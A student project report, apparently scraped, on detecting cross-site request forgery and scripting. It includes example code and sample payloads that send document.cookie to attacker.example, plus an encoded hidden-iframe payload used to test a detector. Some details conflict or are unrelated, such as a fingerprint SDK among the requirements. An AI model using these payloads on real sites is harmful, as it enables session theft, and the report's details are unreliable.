cross site
TRANSCRIPT
-
8/3/2019 Cross Site
1/89
Defence mechanism and prevention of attack for cross-site scripting forgery
CHAPTER 1
INTRODUCTION
Cross-site request forgery (abbreviated XSRF or CSRF, sometimes also called
session riding) denotes a relatively new class of attack against web application users.
By launching a successful XSRF attack against a user, an adversary is able to initiate
arbitrary HTTP requests from that user to the vulnerable web application. Thus, if the
victim is authenticated, a successful XSRF attack effectively bypasses the underlying
authentication mechanism: the browser attaches the victim's session cookie to the forged
request exactly as it does to a genuine one, so the server cannot tell them apart. Depending
on the web application, the attacker could, for instance, post messages or send mails in the
name of the victim, or even change the victim's login name and password. The damage
caused by such attacks can therefore be severe. In contrast to well-known web security
problems such as SQL injection and XSS, cross-site request forgery (XSRF) appears to be
a problem that is little known to web application developers and the academic community.
As a result, only a few mitigation solutions exist. Unfortunately, these solutions either
do not offer complete protection against XSRF or require significant modifications to each
individual web application that is to be protected. In this paper, we present a solution
that provides protection from XSRF attacks. More precisely, our approach is based on a
server-side proxy that detects and prevents XSRF attacks in a way that is transparent to
users as well as to the web application itself. One important advantage of our solution is
that only minimal manual effort is required to protect existing applications. Our
experimental results demonstrate that we can use our prototype to secure a number of
popular open-source web applications against XSRF attacks without negatively affecting
the applications' behavior. An expanded version of this paper containing additional
details can be found on our web site.
1.1 OVERVIEW OF SYSTEM
We propose a CSRF attack detection mechanism to alleviate the current
limitations. Our approach is based on the notions of visibility and content, and it can be
considered as a layer of defense in depth. Note that it should not be considered a
solution to CSRF that frees a development organization from coding securely. The
visibility notion relates the supplied parameters and values of a suspected request to one of
the windows that is displaying a web page from the target website. We are motivated by the
fact that if a request supplies information to a trusted website (e.g., a form
submission), one of the open windows in the browser must relate to the request. The
content notion is based on the observation that a sensitive request generates a response
that should be visible (e.g., generation of a new page) to let a user know about the
outcome of his or her request.
In contrast, an attack request is hidden in JavaScript code or in the URL attributes of
HTML tags and does not result in any visible response. As a result, the expected content
type does not match the actual content type returned by a server program for a
suspected request. For example, an attack request can be set as the source URL of an
image, in which case the response should be an image file (e.g., image/jpeg). However, the
response content type of an attack request might be text/html, which does not match the
expected content.
CHAPTER 2
SYSTEM ANALYSIS
2.1 Existing System
There are several browser-based approaches, and they suffer from several
limitations. Most of the techniques rely on cross-origin policies (i.e., white-listed URL
patterns that are allowed to be launched from browsers). Cross-origin policies may not be
configured correctly, and a badly configured policy allows cross-origin requests to be
launched and makes the defense ineffective.
Moreover, these approaches focus on the detection of reflected CSRF
attacks (i.e., attack payloads reside in third-party websites that are vulnerable to XSS),
and they might not detect stored CSRF attacks (i.e., attack payloads reside in trusted
websites that are vulnerable to XSS).
2.1.1 Disadvantages of the Existing system
Users can unknowingly execute malicious scripts when viewing dynamically
generated pages based on content provided by an attacker.
An attacker can take over the user session before the user's session cookie expires.
An attacker can connect users to a malicious server of the attacker's choice.
An attacker who can convince a user to access a URL supplied by the attacker could
cause script or HTML of the attacker's choice to be executed in the user's browser.
2.2 Proposed System
We propose a CSRF attack detection mechanism to alleviate the current
limitations. Our approach is based on the notions of visibility and content, and it can be
considered as a layer of defense in depth. In this system we propose the detection of
CSRF attacks through visibility and content checking of suspected requests.
The idea is to intercept a suspected request containing parameters and values and relate
them to one of the visible forms present in an open window.
If there is an exact match, we modify the suspected request to make it
benign, launch it to the remote website, identify the content type of the response, and
match it with the expected content type. Any mismatch between request attribute values
or content type results in a warning.
Our proposed approach does not rely on cross-origin policy or server-side
program state. Moreover, it does not require storing URLs or tokens to be matched at a
later stage for attack detection. The proposed approach is implemented as a Firefox plug-in
and evaluated for three real-world programs vulnerable to both CSRF and XSS.
2.2.1 Advantages of Proposed system
No separate storage is needed for URLs or tokens.
Suspected cross-site requests are not launched silently.
The user is alerted whenever a suspected cross-site request is detected.
More secure.
Efficient detection process.
CHAPTER 3
DEVELOPMENT ENVIRONMENT
3.1 HARDWARE REQUIREMENTS
Hard disk: 40 GB
RAM: 128 MB
Processor: Pentium
Keypad
Mobile phone with data cable
3.2 SOFTWARE REQUIREMENTS
J2EE, Swing
Windows 98 or later
MS SQL Server
Finger print STK 2007
3.3 SOFTWARE REQUIREMENT SPECIFICATIONS
3.3.1 FEATURES OF JAVA
Accessibility from any location in the world:
1.) Java is an internet programming language
2.) The web provides access to a computer from anywhere in the world
Security:
1.) Java is designed to run untrusted code safely
2.) Bytecode is verified before it is executed, and code that breaks the verifier's
rules or the sandbox's permissions is rejected rather than run
Platform independent language:
1.) The Java compiler compiles Java code to an intermediate byte code that is
understood by the JVM (Java Virtual Machine)
2.) To execute the byte codes the system must have a Java interpreter or a
Java-enabled internet browser
Speed:
1.) Java is a high-performance language
2.) Faster than programs written in purely interpreted languages, such as BASIC
3.) With just-in-time compilation its speed approaches, but does not generally
exceed, that of C and C++
Development time:
1.) Java is simple
2.) Java programmers do not need to manage memory manually
3.3.2 THE JAVA PROGRAMMING LANGUAGE
The Java programming language is a high-level language that can be
characterized by all of the following buzzwords: simple, object oriented, distributed,
multithreaded, dynamic, architecture neutral, portable, high performance, robust, and
secure.
Each of the preceding buzzwords is explained in The Java Language
Environment, a white paper written by James Gosling and Henry McGilton.
In the Java programming language, all source code is first written in plain text
files ending with the .java extension. Those source files are then compiled into .class
files by the javac compiler. A .class file does not contain code that is native to your
processor; it instead contains bytecodes, the machine language of the Java Virtual
Machine (Java VM). The java launcher tool then runs your application with an instance
of the Java Virtual Machine.
3.3.3 AN OVERVIEW OF THE SOFTWARE DEVELOPMENT PROCESS
Because the Java VM is available on many different operating systems, the
same .class files are capable of running on Microsoft Windows, the Solaris
Operating System (Solaris OS), Linux, or Mac OS. Some virtual machines, such as the
Java HotSpot virtual machine, perform additional steps at runtime to give your
application a performance boost. These include various tasks such as finding performance
bottlenecks and recompiling (to native code) frequently used sections of code.
Through the Java VM, the same application is capable of
running on multiple platforms.
The Java Platform
A platform is the hardware or software environment in which a program runs.
We've already mentioned some of the most popular platforms like Microsoft Windows,
Linux, Solaris OS, and Mac OS. Most platforms can be described as a combination of the
operating system and underlying hardware. The Java platform differs from most other
platforms in that it's a software-only platform that runs on top of other hardware-based
platforms.
The Java platform has two components:
The Java Virtual Machine
The Java Application Programming Interface (API)
You've already been introduced to the Java Virtual Machine; it's the base for the Java
platform and is ported onto various hardware-based platforms.
The API is a large collection of ready-made software components that provide
many useful capabilities. It is grouped into libraries of related classes and interfaces;
these libraries are known as packages. The next section, What Can Java Technology Do?
highlights some of the functionality provided by the API.
The API and Java Virtual Machine insulate the program
from the underlying hardware.
As a platform-independent environment, the Java platform can be a bit slower
than native code. However, advances in compiler and virtual machine technologies are
bringing performance close to that of native code without threatening portability.
3.3.4. COMPONENTS
Visual controls such as textboxes, checkboxes, listboxes, buttons & combo
boxes are called components. Each component inherits the properties of its parent
container such as font & color.
Containers:
Top level windows that hold these components are called containers. The
container also controls the position of components placed in it
Frame Window:
Containers are contained within the frame window, which is another
type of container.
The frame window is the top-level window and as such does not have a
parent container.
AWT (Abstract Window Toolkit):
In Java 1.0 user interfaces are created using AWT. Front ends created using AWT
look different on different platforms.
Java Foundation Classes (JFC):
JFC is an extension of the original AWT.
JFC was first delivered as a part of the Java platform.
It has a rich set of components that are completely platform independent and
offer improved performance.
We can create large-scale internet and intranet applications using JFC.
This lesson gives you a brief introduction to using the Java Foundation
Classes (JFC) Swing packages. After telling you about JFC and Swing, it helps you get
the necessary software and walks you through how to compile and run a program that
uses the Swing packages. Next, it shows you how to run programs using Java Web Start.
The next lesson, learning swing by example, will build on these first steps to
help you create several increasingly more complex examples. For now, let's start with the
basics.
Compiling and running of swing process
This section gives you detailed instructions on how to install, create, compile
and run a program that uses Swing components.
About JFC and swing
JFC is short for Java Foundation Classes, which encompass a group of features
for building graphical user interfaces (GUIs) and adding rich graphics functionality and
interactivity to Java applications. It is defined as containing the features shown in the
table below.
Features of the Java Foundation Classes
Swing GUI Components: Includes everything from buttons to split panes to tables.
Pluggable Look-and-Feel Support: Gives any program that uses Swing components a choice of
look and feel. For example, the same program can use either the Java or the Windows look
and feel. Many more look-and-feel packages are available from various sources. As of
v1.4.2, the Java platform supports the GTK+ look and feel, which makes hundreds of
existing look and feels available to Swing programs.
Accessibility API: Enables assistive technologies, such as screen readers and Braille
displays, to get information from the user interface.
Java 2D API: Enables developers to easily incorporate high-quality 2D graphics, text, and
images in applications and applets. Java 2D includes extensive APIs for generating and
sending high-quality output to printing devices.
Drag-and-Drop Support: Provides the ability to drag and drop between Java applications
and native applications.
Internationalization: Allows developers to build applications that can interact with users
worldwide in their own languages and cultural conventions. With the input method
framework developers can build applications that accept text in languages that use
thousands of different characters, such as Japanese, Chinese, or Korean.
This trail concentrates on the Swing components. We help you choose the
appropriate components for your GUI, tell you how to use them, and give you the
background information you need to use them effectively. We also discuss other JFC
features as they apply to Swing components.
Version Note: "Swing" was the code name of the project that developed the new
components. Although unofficial, it's frequently used to refer to the new components and
related API. "Swing" is immortalized in the package names for the Swing API, which
begin with javax.swing.
3.3.5 ABOUT JSP TECHNOLOGY
JSP
JavaServer Pages, or JSP for short, is Sun's solution for developing dynamic web sites.
JSP provides excellent server-side scripting support for creating database-driven web
applications. JSP enables developers to insert Java code directly into a .jsp file, which
makes development simple and maintenance easy. JSP pages are efficient: a page is compiled
and loaded into the web server's memory on the first request, and subsequent calls are
served within a very short period of time.
In today's environment most web sites serve dynamic pages based on user
requests. A database is a very convenient way to store user data and other things.
JDBC provides excellent database connectivity in heterogeneous database environments.
Using JSP and JDBC it is very easy to develop database-driven web applications.
Java is known for its characteristic of "write once, run anywhere." JSP pages
are platform independent: you can port your .jsp pages to any platform.
JSP ARCHITECTURE
JSP pages are a high-level extension of servlets that enables developers
to embed Java code in HTML pages. JSP files are compiled into a servlet by the JSP
engine, and the compiled servlet is used by the engine to serve requests.
The javax.servlet.jsp package defines two interfaces:
JspPage
HttpJspPage
Between them these interfaces define the three lifecycle methods of a compiled JSP
page:
jspInit()
jspDestroy()
_jspService(HttpServletRequest request, HttpServletResponse response)
All three are present in the compiled JSP file. The programmer may define jspInit() and
jspDestroy() (declared by JspPage), but the _jspService(HttpServletRequest
request, HttpServletResponse response) method (declared by HttpJspPage) is generated by
the JSP engine.
3.4 ADDITIONAL FEATURES OF JAVA
Development Tools: The development tools provide everything you'll need for
compiling, running, monitoring, debugging, and documenting your applications.
As a new developer, the main tools you'll be using are the javac compiler, the
java launcher, and the javadoc documentation tool.
Application Programming Interface (API): The API provides the core
functionality of the Java programming language. It offers a wide array of useful
classes ready for use in your own applications. It spans everything from basic
objects, to networking and security, to XML generation and database access, and
more. The core API is very large; to get an overview of what it contains, consult
the Java SE Development Kit 6 (JDK 6) documentation.
Deployment Technologies: The JDK software provides standard mechanisms
such as the Java Web Start software and Java Plug-In software for deploying your
applications to end users.
User Interface Toolkits: The Swing and Java 2D toolkits make it possible to
create sophisticated Graphical User Interfaces (GUIs).
Integration Libraries: Integration libraries such as the Java IDL API, JDBC API, Java
Naming and Directory Interface (JNDI) API, Java RMI, and Java Remote Method Invocation
over Internet Inter-ORB Protocol Technology (Java RMI-IIOP Technology) enable database
access and manipulation of remote objects.
3.4.1 GARBAGE COLLECTION
o It is the process that automatically frees the memory of objects that are no longer in
use.
o The Java specification does not prescribe a particular garbage collection technique.
How Will Java Technology Change My Life?
We can't promise you fame, fortune, or even a job if you learn the Java
programming language. Still, it is likely to make your programs better and requires less
effort than other languages. We believe that Java technology will help you do the
following:
Get started quickly: Although the Java programming language is a powerful
object-oriented language, it's easy to learn, especially for programmers already
familiar with C or C++.
Write less code: Comparisons of program metrics (class counts, method counts,
and so on) suggest that a program written in the Java programming language can
be four times smaller than the same program written in C++.
Write better code: The Java programming language encourages good coding
practices, and automatic garbage collection helps you avoid memory leaks. Its
object orientation, its JavaBeans component architecture, and its wide-ranging,
easily extendible API let you reuse existing, tested code and introduce fewer bugs.
Develop programs more quickly: The Java programming language is simpler than
C++, and as such, your development time could be up to twice as fast when
writing in it. Your programs will also require fewer lines of code.
Avoid platform dependencies: You can keep your program portable by avoiding
the use of libraries written in other languages.
Write once, run anywhere: Because applications written in the Java programming
language are compiled into machine-independent bytecodes, they run consistently
on any Java platform.
Distribute software more easily: With Java Web Start software, users will be able
to launch your applications with a single click of the mouse. An automatic version
check at startup ensures that users are always up to date with the latest version of
your software. If an update is available, the Java Web Start software will
automatically update their installation.
3.4.2 ENCAPSULATION
A class is a blueprint or prototype from which objects are created.
Objects are key to understanding object-oriented technology.
Objects consist of state and related behavior.
An object stores its state in fields (variables in some programming languages) and
exposes its behavior through methods (functions in some programming
languages).
Methods operate on an object's internal state and serve as the primary mechanism
for object-to-object communication. Hiding internal state and requiring all interaction to
be performed through an object's methods is known as data encapsulation, a
fundamental principle of object-oriented programming.
3.4.3 INHERITANCE
Object-oriented programming allows classes to inherit commonly used state and behavior
from other classes.
In the Java programming language, each class is allowed to have one direct
superclass, and each superclass has the potential for an unlimited number of
subclasses.
Syntax: At the beginning of your class declaration, use the extends keyword,
followed by the name of the class to inherit from
3.4.4 INTERFACE
An interface is a contract between a class and the outside world, and this contract
is enforced at build time by the compiler.
When a class implements an interface, it promises to provide the behavior
published by that interface.
Implementing an interface allows a class to become more formal about the
behavior it promises to provide
3.4.5 PACKAGES
Using the import statement we can use Java packages in a program (it is similar to
the #include directive in C++).
A package contains only classes and interfaces, whereas a C++ header file can contain
free-standing functions.
Packages have a hierarchical structure.
If no package name is specified, the class becomes a member of the default
package.
3.5 HANDLING EVENTS
Every time the user types a character or pushes a mouse button, an event
occurs. Any object can be notified of the event. All the object has to do is implement the
appropriate interface and be registered as an event listener on the appropriate event
source.
The SwingApplication class implements an event handler for button clicks
(action events). Here is the relevant code, completed so that it compiles:
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.JButton;
import javax.swing.JLabel;
public class SwingApplication implements ActionListener {
    private int numClicks = 0;
    private final String labelPrefix = "Clicks: ";
    private final JLabel label = new JLabel(labelPrefix + numClicks);
    private final JButton button = new JButton("I'm a Swing button!");
    public SwingApplication() {
        button.addActionListener(this);   // register this object as the button's listener
    }
    public void actionPerformed(ActionEvent e) {   // invoked by Swing on every click
        numClicks++;
        label.setText(labelPrefix + numClicks);
    }
}
Every event handler requires three pieces of code:
In the declaration for the event handler class, one line of code specifies
that the class either implements a listener interface or extends a class that implements
a listener interface. For example:
public class MyClass implements ActionListener {
Another line of code registers an instance of the event handler class as a listener on
one or more components. For example:
someComponent.addActionListener(instanceOfMyClass);
The event handler class has code that implements the methods in the listener interface.
For example:
public void actionPerformed(ActionEvent e) {
...//code that reacts to the action... }
In general, to detect when the user clicks an onscreen button (or does the keyboard
equivalent), a program must have an object that implements the ActionListener
interface. The program must register this object as an action listener on the button (the
event source), using the addActionListener method. When the user clicks the onscreen
button, the button fires an action event. This results in the invocation of the action
listener's actionPerformed method (the only method in the ActionListener interface).
The single argument to the method is an ActionEvent object that gives information
about the event and its source.
Swing components can generate many kinds of events. The following table lists a few
examples.
Some Events and Their Associated Event Listeners
User clicks a button, presses Enter while typing in a text field, or chooses a menu item: ActionListener
User closes a frame (main window): WindowListener
User presses a mouse button while the cursor is over a component: MouseListener
User moves the mouse over a component: MouseMotionListener
Component becomes visible: ComponentListener
Component gets the keyboard focus: FocusListener
Table or list selection changes: ListSelectionListener
Any property in a component changes, such as the text on a label: PropertyChangeListener
To learn more about how to detect events from a particular component, refer to each
component's how-to section in Using Swing Components.
3.6 CLIENT/SERVER TECHNOLOGY
Client/Server computing is an environment that distributes processing
across many computers. A client/server system is used to access different
databases or services via a network through a two-tier or three-tier
architecture.
Figure 1: Two-tier Architecture for Data Access.
"The job of a client is to request for a service and the job of the server is to serve
the request."
Basically there are two types of clients:
1. Dependent clients.
2. Independent clients.
Dependent clients can connect only to a single database, while independent clients
connect to various databases through DBMS-independent standards such as ODBC (Open
Database Connectivity) and JDBC.
CHAPTER 4
SYSTEM DESIGN
4.1 ARCHITECTURE DIAGRAM
Figure: 4.1 Architecture diagram
4.2 USECASE DIGRAM
Figure: 4.2 Use case diagram
4.3 SEQUENCE DIAGRAM
Participants: Attacker, User browser, Malicious script, Attacker's server, Legitimate server.
Messages:
1: Attacker constructs a malicious script and files a page containing it on the legitimate server
2: Attacker emails the URL to the user and convinces the user to click on it
3: User browser requests the page from the legitimate server
4: Legitimate server returns HTML containing the malicious script
5: User browser runs the malicious script
6: Malicious script issues an authorized request to the legitimate server and sends data to the attacker's server
Figure: 4.3 Sequence diagram
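As an added illustration of the chain in Figure 4.3 and of the session riding described in Chapter 1 (example code written for this page, not the project's implementation), the following JavaScript models a browser that attaches the victim's bank cookie to every request aimed at the bank, a bank server that trusts that cookie alone, and, for comparison, the same server demanding a per-session synchronizer token, the kind of per-application server-side change the introduction mentions. The origins bank.example and attacker.example, the session id, the token, the /guestbook and /transfer paths and the amounts are all invented for the example; it runs under Node.js without a network.

```javascript
// Added example for this page, not the project's code: an in-process model of the
// session-riding chain in Figure 4.3. The browser attaches the victim's bank cookie
// to every request aimed at the bank, whether Alice meant to send it or not.
// All origins, paths, session ids, tokens and amounts are constructed for the example.

const BANK = "https://bank.example";

// Legitimate server. requireToken=false is the vulnerable version that authenticates
// on the session cookie alone; requireToken=true additionally demands a per-session
// synchronizer token (an assumed server-side countermeasure, not the report's plug-in).
function makeBank({ requireToken }) {
  const state = {
    sessions: { "sid-42": { user: "alice", csrfToken: "tok-9f3c" } },
    balances: { alice: 1000, mallory: 0 },
  };
  // Pages the bank serves. The attacker has managed to file a guestbook entry that
  // carries a hostile <img>, so the forged request comes from the trusted site itself.
  const pages = {
    "/transfer-form": (s) =>
      `<form method="POST" action="/transfer">` +
      `<input type="hidden" name="token" value="${s.csrfToken}"></form>`,
    "/guestbook": () =>
      `<p>nice site</p><img src="${BANK}/transfer?to=mallory&amount=500">`,
  };
  return {
    state,
    handle(req) {
      const session = state.sessions[req.cookie];
      if (!session) return { status: 401, body: "login required" };
      if (req.path in pages) return { status: 200, body: pages[req.path](session) };
      if (req.path === "/transfer") {
        if (requireToken && req.params.token !== session.csrfToken) {
          return { status: 403, body: "missing or wrong CSRF token" };
        }
        const amount = Number(req.params.amount);
        state.balances[session.user] -= amount;
        state.balances[req.params.to] = (state.balances[req.params.to] || 0) + amount;
        return { status: 200, body: "transfer done" };
      }
      return { status: 404, body: "" };
    },
  };
}

// Minimal browser: a cookie jar keyed by origin and automatic fetching of <img src>.
function makeBrowser(servers) {
  const cookies = { [BANK]: "sid-42" }; // Alice is already logged in to the bank
  const log = [];
  function request(url) {
    const u = new URL(url);
    const req = {
      method: "GET",
      path: u.pathname,
      params: Object.fromEntries(u.searchParams),
      cookie: cookies[u.origin], // sent on every request to that origin: this is session riding
    };
    log.push({ url, cookie: req.cookie });
    const server = servers[u.origin];
    return server ? server.handle(req) : { status: 0, body: "" };
  }
  function visit(url) {
    const res = request(url);
    // Step 5 of the diagram: the page's subresources load without any user action.
    for (const m of res.body.matchAll(/<img[^>]+src="([^"]+)"/g)) request(m[1]);
    return res;
  }
  return { visit, log };
}

// Steps 2-6: Alice follows the emailed link to the poisoned guestbook page.
function runChain(requireToken) {
  const bank = makeBank({ requireToken });
  const browser = makeBrowser({ [BANK]: bank });
  browser.visit(`${BANK}/guestbook`);
  return { balances: bank.state.balances, requests: browser.log };
}

// runChain(false).balances -> { alice: 500, mallory: 500 }  (forged transfer succeeded)
// runChain(true).balances  -> { alice: 1000, mallory: 0 }   (rejected: no token in the <img> URL)
```

In the vulnerable run the forged request carries Alice's cookie because the browser, not the attacker, supplies it; the hardened server refuses the same request because the token lives only in the bank's own form, which the attacker's <img> cannot read. The browser model issues only GET requests, so the legitimate token-bearing POST is not exercised here. Seen from the client side, the report's checks would flag the same request: it carries parameters, no open window shows a bank form with those values, and an image element is answered with text.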
4.4 DATA FLOW DIAGRAM
Figure: 4.4 Dataflow diagram
CHAPTER 5
PROJECT DESCRIPTION
5.1 PROJECT DEFINITION
Nowadays cross-site attacks are increasingly common and threaten all
internet users. Neither the users nor the trusted site are aware of this type of attack,
and users lose their confidential data to the hacker's site.
Solution
This project is implemented to counter cross-site attacks, whether stored or
reflected. The system does not let a suspected cross-site request pass silently; it detects
cross-site requests with mechanisms such as visibility checking and content checking.
5.2 .MODULE DESCRIPTION
1. Client
2. Legitimate server
3. Malicious script
4. Filtering
5. Attackers server
6. Cross-site detection and alert system
1. Client's browser
A client can access any website via any browser. The browser the client is currently
using to access a site is known as the client's browser. It may be any browser, and the
client may access any site, whether a cross site or a trusted website.
2. Legitimate server
The legitimate server is a trusted website that holds all the services needed by many
clients. Based on the user's request it provides the service. Sometimes hackers manage to
write malicious code into a trusted site as well; whenever a client accesses the legitimate
server, that malicious code also starts to run.
3. Malicious script
Users unknowingly execute scripts written by an attacker when they follow a
malicious link in a mail message. Because the malicious script is executed in a context
that appears to have originated from the legitimate server, the attacker has full access to
the retrieved document and may send data contained in the page back to their own site. If
the embedded script can interact further with the legitimate server without alerting the
victim, the attacker could also post data to a different page on the legitimate web server
in the victim's name.
4. Filtering
4. Filtering
The basis of this approach is never to trust user input and always to filter the meta
characters ("special" characters) defined in the HTML specification. Each input
field, including link parameters, is validated for script tags. When one is found, and
depending on the context, the input is rejected, which prevents the malicious
HTML from being presented to the user.
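An added example (not the project's filter) of the script-tag validation described above, placed beside the output encoding a practitioner would pair with it. The guestbook payloads are constructed, and the assumed context is untrusted text placed in the body of an HTML element. It runs under Node.js.

```javascript
// Added example for this page, not the project's filter. Two layers: the input-side
// script-tag rejection the report describes, and HTML entity encoding of meta
// characters on output. Payloads are constructed samples.

// Input-side check as described: reject any input that contains a <script> tag.
const SCRIPT_TAG = /<\s*\/?\s*script\b/i;
function containsScriptTag(input) {
  return SCRIPT_TAG.test(input);
}

// Output-side defence: encode the five HTML meta characters so the browser renders
// the text literally instead of parsing it as markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Render one guestbook entry: the tag check rejects, the encoder neutralises.
function renderEntry(input) {
  if (containsScriptTag(input)) return { rejected: true, html: "" };
  return { rejected: false, html: `<p>${escapeHtml(input)}</p>` };
}

// Constructed payloads. The third carries no <script> tag at all: an event handler
// on a broken image runs just the same, so a tag check alone does not stop it.
const PAYLOADS = {
  plain: "nice site",
  scriptTag: '<script>new Image().src="https://attacker.example/log?c="+document.cookie</script>',
  noScriptTag: '<img src=x onerror="location=\'https://attacker.example/?\'+document.cookie">',
};

const RESULTS = Object.fromEntries(
  Object.entries(PAYLOADS).map(([name, payload]) => [name, renderEntry(payload)])
);
```

The script-tag check catches the first payload, but the onerror payload passes it untouched and is only made harmless by the encoding step; this is why validation of tags should be treated as a filter in front of, not instead of, context-aware output encoding.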
Filtering is performed based on the following sub modules
Request checker
If a request is a GET type, the destination URL is identified, and the
query string is tokenized to obtain request parameters and values. If a
request is a POST type, the header is examined to obtain the posted
parameters and values as a string, which is tokenized further. If a GET or
POST request contains parameters and values, then it is considered as
suspected and forwarded to the window and form checker module.
Otherwise, it is forwarded to the destination website.
Window and form checker
In the response page, if no window relates the destination domain, we consider
the request as an attack and move program control to attack handler module.
Visibility checking
If the displayed page contains no form, we can conclude that the request is
either a reflected or stored CSRF attack.
Content checking
Content checking relies on the matching of the response of a suspected request
with the expected response.
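As an added example (not code from this report), the following Python models the four filtering sub modules just described: the request checker tokenizes GET query or POST body parameters, the window and form checker compares the responding domain with the destination, the visibility check flags zero-size or display:none script and iframe elements (including a base64-encoded script body, the pattern the report's ScriptReader decodes), and the content check compares the expected and actual content type. The host names, sample pages and encoded payload are constructed test data.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# Hiding markers checked by the report's ScriptReader: width=0, height=0, display:none.
_MARKERS = {
    "width=0": re.compile(r'width\s*=\s*"?0\b', re.I),
    "height=0": re.compile(r'height\s*=\s*"?0\b', re.I),
    "display:none": re.compile(r'display\s*:\s*none', re.I),
}

def hidden_markers(text):
    """Names of the hiding markers present in a fragment of markup or script."""
    return [name for name, rx in _MARKERS.items() if rx.search(text)]

def check_request(method, url, body=""):
    """Request checker: tokenize a GET query or POST body; any parameters make it suspected."""
    parts = urlsplit(url)
    params = {}
    if method.upper() == "GET":
        params = dict(parse_qsl(parts.query, keep_blank_values=True))
    elif method.upper() == "POST":
        params = dict(parse_qsl(body, keep_blank_values=True))
    return {"host": (parts.hostname or "").lower(), "params": params, "suspected": bool(params)}

class _PageScanner(HTMLParser):
    """Counts forms and records hidden script/iframe elements and encoded script bodies."""
    def __init__(self):
        super().__init__()
        self.forms = 0
        self.hidden = []     # (tag, marker) pairs for script/iframe elements
        self.encoded = []    # decoded bodies of jscript.encode / javascript.encode scripts
        self._collect, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "").strip().lower() for k, v in attrs}
        if tag == "form":
            self.forms += 1
        if tag in ("iframe", "script"):
            for attr in ("width", "height"):
                if a.get(attr) == "0":
                    self.hidden.append((tag, attr + "=0"))
            if "display:none" in a.get("style", "").replace(" ", ""):
                self.hidden.append((tag, "display:none"))
        if tag == "script" and a.get("language") in ("jscript.encode", "javascript.encode"):
            self._collect, self._buf = True, []

    def handle_data(self, data):
        if self._collect:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._collect:
            self._collect = False
            raw = "".join(self._buf).strip()
            try:
                self.encoded.append(base64.b64decode(raw, validate=True).decode("utf-8", "replace"))
            except (binascii.Error, ValueError):
                self.encoded.append(None)  # undecodable body: recorded and reported as suspicious

def check_response(request_host, response_host, html, content_type, expected_type="text/html"):
    """Window/form checker, visibility check and content check for one suspected request."""
    if response_host.lower() != request_host.lower():
        return {"verdict": "attack", "reasons": ["no window relates to the destination domain"]}
    reasons = []
    if not content_type.lower().startswith(expected_type):
        reasons.append("content type mismatch: expected %s, got %s" % (expected_type, content_type))
    s = _PageScanner()
    s.feed(html)
    s.close()
    reasons += ["%s %s" % pair for pair in s.hidden]
    for body in s.encoded:
        if body is None:
            reasons.append("undecodable encoded script")
        else:
            reasons += ["encoded script %s" % m for m in hidden_markers(body)]
    if reasons:
        return {"verdict": "attack", "reasons": reasons}
    if s.forms == 0:
        return {"verdict": "suspected", "reasons": ["response contains no form"]}
    return {"verdict": "verified", "reasons": []}

# Constructed sample pages: a plain login form, and a page whose base64-encoded script
# writes a zero-size iframe (the pattern the report's ScriptReader decodes and checks).
GOOD_PAGE = '<html><body><form action="/login" method="post"><input name="user"></form></body></html>'
_PAYLOAD = base64.b64encode(
    b'document.writeln("<iframe src=http://attacker.example width=0 height=0></iframe>");').decode()
BAD_PAGE = ('<html><body><form action="/search"><input name="q"></form>'
            '<script language="javascript.encode">' + _PAYLOAD + '</script></body></html>')

def demo():
    """Run the checker over a constructed GET request and both sample pages."""
    req = check_request("GET", "http://shop.example/search?q=shoes&page=2")
    good = check_response(req["host"], "shop.example", GOOD_PAGE, "text/html; charset=utf-8")
    bad = check_response(req["host"], "shop.example", BAD_PAGE, "text/html")
    return req, good, bad
```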
5. Attacker's server
The sensitive data stolen from the client's browser is stored on the attacker's server,
where it can later be misused to compromise the whole system.
Cross-site scripting is achieved when an attacker is able to cause a legitimate Web server
to send a page to a victim user's Web browser that contains a malicious script of the
attacker's choosing. The malicious script then runs with the privileges of a
legitimate script originating from the legitimate Web server. In this scenario, the attacker
submits a page containing malicious script to the vulnerable part of the site. When the page
is displayed, the malicious script runs, collects the user's cookies, and sends a request to
the attacker's Web site with the cookies gathered. Using this technique, the attacker can
gain sensitive data such as passwords, credit card numbers, and any arbitrary information
the user inputs.
6. Cross-site detection and alert system
If malicious code is detected, that code is forwarded to the attack handler module.
It stops a suspected request and generates a warning in the browser to make the user aware
of the deviation identified, such as a mismatch between the supplied parameters of a request
and the actual parameters present in a form. It also reports a mismatch between the expected
and actual content type. The user can then allow or disallow the request.
CHAPTER 6
TESTING
TESTING:
Testing is a set of activities that can be planned in advance and conducted
systematically. For this reason a template for software testing, a set of steps into which
we can place specific test case design techniques and testing methods, should be defined
for the software process.
Testing often accounts for more effort than any other software engineering
activity. If it is conducted haphazardly, time is wasted, unnecessary effort is expended
and, even worse, errors sneak through undetected. It would therefore seem reasonable to
establish a systematic strategy for testing software.
Type Of Testing
There are two types of testing according to their behaviour:
I. Unconventional Testing
II. Conventional Testing
Unconventional Testing
Unit Testing:
Procedure-level testing is done first. Improper inputs are given, and the errors
that occur are noted and eliminated. Then web-form-level testing is done, for example
checking that data is stored in the table in the correct manner.
In the company as well as the seeker registration form, a zero-length username and
password are given and checked. A duplicate username is also given and checked. In
the job and question entry, the button sends data to the server only if the client-side
validations pass.
Dates are entered in the wrong manner and checked. A wrong email-id and web
site URL (Uniform Resource Locator) are given and checked.
Integration Testing:
Testing is done for each module. After testing all the modules, the modules
are integrated and the final system is tested with test data specially designed
to show that the system will operate successfully under all its conditions. Thus
system testing is a confirmation that all is correct and an opportunity to show the user that
the system works.
Module Test:
Module Testing is the process of testing the system module by module. It includes
the various inputs given, the outputs produced and their correctness. Testing in this
way makes all the bugs that have occurred clear.
Interface Testing:
Interface Testing is performed to verify the interfaces between sub
modules while the sub modules are integrated into the master module, recursively.
Validation Testing:
The final step is Validation testing, which determines whether the software
functions as the user expects. The end user rather than the system developer conducts this
test; most software developers do so through a process called Alpha and Beta Testing, to
uncover errors that only the end user seems able to find.
The completion of the entire project depends on the full satisfaction of the end
users. In the project, validation testing is made in various forms.
CHAPTER 7
IMPLEMENTATION AND MAINTENANCE
7.1 IMPLEMENTATION
Implementation is the most crucial stage in achieving a
successful system and giving the users confidence that the new system is workable and
